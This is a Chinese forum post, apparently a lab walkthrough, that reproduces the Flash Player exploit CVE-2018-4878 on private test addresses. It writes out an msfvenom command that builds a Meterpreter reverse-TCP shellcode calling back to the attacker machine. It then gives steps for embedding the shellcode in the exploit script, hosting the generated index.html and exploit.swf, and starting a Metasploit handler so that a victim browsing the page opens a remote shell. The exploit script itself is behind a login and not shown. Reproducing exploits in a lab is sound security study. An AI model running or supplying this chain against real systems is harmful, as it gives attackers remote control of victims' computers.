|  | 
 
| 前言 这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现。今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,我会努力的,相信不久我也能写出二进制漏洞分析的文章。 环境该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客 组织已经成功利用这个0Day 漏洞发起攻击。攻击机: kali 2018  (192.168.59.6)复现过程靶机: windows 10 x64   (192.168.59.160)
 Web服务器: Windows 7 X64  (192.168.59.127)
 我们先在kali生成一个python类型的shellcodemsfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f p ython > /root/shellcode.txt
 
 LHOST就是kali的ip 地址,6666端口 你可以随便设置,/root/shellcode.txt要生成的文件路径2.替换EXP里面的shellcode 3.使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf
 4.然后把这两个文件放到Web服务器里面
 5.在kali的MSF里面设置监听 msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.59.6msf exploit(handler) > set LPORT 6666msf exploit(handler) > exploit 6.然后使用靶机的win10 IE访问Web服务器的文件index.html cve-2018-4878.py 代码
 
 | 
 
x本帖子中包含更多资源您需要 登录 才可以下载或查看,没有账号?立即注册  |